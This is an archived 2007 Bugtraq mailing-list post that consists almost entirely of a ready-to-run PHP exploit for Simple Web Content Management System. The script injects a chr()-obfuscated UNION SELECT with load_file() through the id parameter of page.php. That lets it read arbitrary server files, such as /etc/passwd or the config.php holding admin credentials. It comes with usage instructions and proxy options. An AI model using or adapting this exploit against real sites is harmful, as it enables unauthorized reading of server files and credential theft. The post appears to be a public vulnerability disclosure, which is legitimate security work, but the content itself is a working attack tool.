lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: 3 Jan 2007 09:15:52 -0000
From: gmdarkfig@...il.com
To: bugtraq@...urityfocus.com
Subject: Simple Web Content Management System SQL Injection Exploit

#!/usr/bin/php
<?php

/**
 * This file require the PhpSploit class.
 * If you want to use this class, the latest
 * version can be downloaded from acid-root.new.fr.
 **/
require("phpsploitclass.php");


if($argc < 3) {
 print("
 --------------------------------------------------------
 Affected.scr..: Simple Web Content Management System
 Poc.ID........: 18070102
 Type..........: SQL Injection
 Risk.level....: Medium
 Src.download..: www.cms-center.com
 Poc.link......: acid-root.new.fr/poc/18070102.txt
 Credits.......: DarkFig
 --------------------------------------------------------
 Usage.........: php xpl.txt <url> <file>
 Options.......: <proxhost:proxport> <proxuser:proxpass>
 Example.......: php xpl.txt http://hihi.org/ /etc/passwd
 --------------------------------------------------------\n");
 exit(1);
}

$url  =$argv[1];$file =$argv[2];
$proxh=$argv[3];$proxa=$argv[4];

$xpl = new phpsploit();
$xpl->agent("Mozilla");
if($proxh) $xpl->proxy($proxh);
if($proxa) $xpl->proxyauth($proxa);

/*
 * $id = $_GET['id'];
 * $query = "SELECT * from content WHERE id = $id";
 * ...
 * @return $row->text;
 *
 * Simple SQL injection (register_globals=off ; magic_quotes_gpc=on).
 * What we want is not in the database, it's in a file (config.php):
 *
 * //this are the logins for the admin part. Change them for security. 
 * $login = "test";  //your login for the admin section.
 * $pass = "1234";   //your login for the admin section.
 *
 * PS: Les chr() ont ÚtÚ utilisÚs dans le but de se foutre de
 * la gueule des personnes l'utilisant seulement pour d4 h4x0r styl3 =).
 *
 */

$header =
chr(0x2f).chr(0x3c).chr(0x68).chr(0x74).chr(0x6d).chr(0x6c).chr(0x3e).chr(0x0d).
chr(0x0a).chr(0x3c).chr(0x68).chr(0x65).chr(0x61).chr(0x64).chr(0x3e).chr(0x0d).
chr(0x0a).chr(0x3c).chr(0x74).chr(0x69).chr(0x74).chr(0x6c).chr(0x65).chr(0x3e).
chr(0x63).chr(0x6f).chr(0x6e).chr(0x74).chr(0x65).chr(0x6e).chr(0x74).chr(0x66).
chr(0x72).chr(0x61).chr(0x6d).chr(0x65).chr(0x3c).chr(0x5c).chr(0x2f).chr(0x74).
chr(0x69).chr(0x74).chr(0x6c).chr(0x65).chr(0x3e).chr(0x0d).chr(0x0a).chr(0x3c).
chr(0x6c).chr(0x69).chr(0x6e).chr(0x6b).chr(0x20).chr(0x68).chr(0x72).chr(0x65).
chr(0x66).chr(0x3d).chr(0x22).chr(0x5c).chr(0x2f).chr(0x73).chr(0x74).chr(0x79).
chr(0x6c).chr(0x65).chr(0x2e).chr(0x63).chr(0x73).chr(0x73).chr(0x22).chr(0x20).
chr(0x72).chr(0x65).chr(0x6c).chr(0x3d).chr(0x22).chr(0x73).chr(0x74).chr(0x79).
chr(0x6c).chr(0x65).chr(0x73).chr(0x68).chr(0x65).chr(0x65).chr(0x74).chr(0x22).
chr(0x20).chr(0x74).chr(0x79).chr(0x70).chr(0x65).chr(0x3d).chr(0x22).chr(0x74).
chr(0x65).chr(0x78).chr(0x74).chr(0x5c).chr(0x2f).chr(0x63).chr(0x73).chr(0x73).
chr(0x22).chr(0x3e).chr(0x0d).chr(0x0a).chr(0x3c).chr(0x6d).chr(0x65).chr(0x74).
chr(0x61).chr(0x20).chr(0x68).chr(0x74).chr(0x74).chr(0x70).chr(0x2d).chr(0x65).
chr(0x71).chr(0x75).chr(0x69).chr(0x76).chr(0x3d).chr(0x22).chr(0x43).chr(0x6f).
chr(0x6e).chr(0x74).chr(0x65).chr(0x6e).chr(0x74).chr(0x2d).chr(0x54).chr(0x79).
chr(0x70).chr(0x65).chr(0x22).chr(0x20).chr(0x63).chr(0x6f).chr(0x6e).chr(0x74).
chr(0x65).chr(0x6e).chr(0x74).chr(0x3d).chr(0x22).chr(0x74).chr(0x65).chr(0x78).
chr(0x74).chr(0x5c).chr(0x2f).chr(0x68).chr(0x74).chr(0x6d).chr(0x6c).chr(0x3b).
chr(0x20).chr(0x63).chr(0x68).chr(0x61).chr(0x72).chr(0x73).chr(0x65).chr(0x74).
chr(0x3d).chr(0x69).chr(0x73).chr(0x6f).chr(0x2d).chr(0x38).chr(0x38).chr(0x35).
chr(0x39).chr(0x2d).chr(0x31).chr(0x22).chr(0x3e).chr(0x0d).chr(0x0a).chr(0x3c).
chr(0x5c).chr(0x2f).chr(0x68).chr(0x65).chr(0x61).chr(0x64).chr(0x3e).chr(0x0d).
chr(0x0a).chr(0x0d).chr(0x0a).chr(0x3c).chr(0x62).chr(0x6f).chr(0x64).chr(0x79).
chr(0x3e).chr(0x2f);

$sql =
chr(0x70).chr(0x61).chr(0x67).chr(0x65).chr(0x2e).chr(0x70).chr(0x68).chr(0x70).
chr(0x3f).chr(0x69).chr(0x64).chr(0x3d).chr(0x2d).chr(0x31).chr(0x2f).chr(0x2a).
chr(0x2a).chr(0x2f).chr(0x75).chr(0x6e).chr(0x69).chr(0x6f).chr(0x6e).chr(0x2f).
chr(0x2a).chr(0x2a).chr(0x2f).chr(0x73).chr(0x65).chr(0x6c).chr(0x65).chr(0x63).
chr(0x74).chr(0x2f).chr(0x2a).chr(0x2a).chr(0x2f).chr(0x6e).chr(0x75).chr(0x6c).
chr(0x6c).chr(0x2c).chr(0x6e).chr(0x75).chr(0x6c).chr(0x6c).chr(0x2c).chr(0x6e).
chr(0x75).chr(0x6c).chr(0x6c).chr(0x2c).chr(0x6e).chr(0x75).chr(0x6c).chr(0x6c).
chr(0x2c).chr(0x6c).chr(0x6f).chr(0x61).chr(0x64).chr(0x5f).chr(0x66).chr(0x69).
chr(0x6c).chr(0x65).chr(0x28).chr(0x63).chr(0x6f).chr(0x6e).chr(0x63).chr(0x61).
chr(0x74).chr(0x28).concatcharfu($file).chr(0x29).chr(0x29).chr(0x2c).chr(0x6e).
chr(0x75).chr(0x6c).chr(0x6c).chr(0x2c).chr(0x6e).chr(0x75).chr(0x6c).chr(0x6c).
chr(0x2c).chr(0x6e).chr(0x75).chr(0x6c).chr(0x6c);

$footer =
chr(0x2f).chr(0x3c).chr(0x5c).chr(0x2f).chr(0x62).chr(0x6f).chr(0x64).chr(0x79).
chr(0x3e).chr(0x0d).chr(0x0a).chr(0x3c).chr(0x5c).chr(0x2f).chr(0x68).chr(0x74).
chr(0x6d).chr(0x6c).chr(0x3e).chr(0x2f);

$xpl->get($url.$sql);
$ct = preg_replace($footer,'',$xpl->getcontent());
print preg_replace($header,'',$ct);

function concatcharfu($file)
{
	$dat = '';
	for($i=0;$i<strlen($file);$i++)
	{
		$dat .= 'char('.ord($file[$i]).')';
		if($i != (strlen($file)-1)) $dat .= ',';
	}
	return $dat;
}

?>

Powered by blists - more mailing lists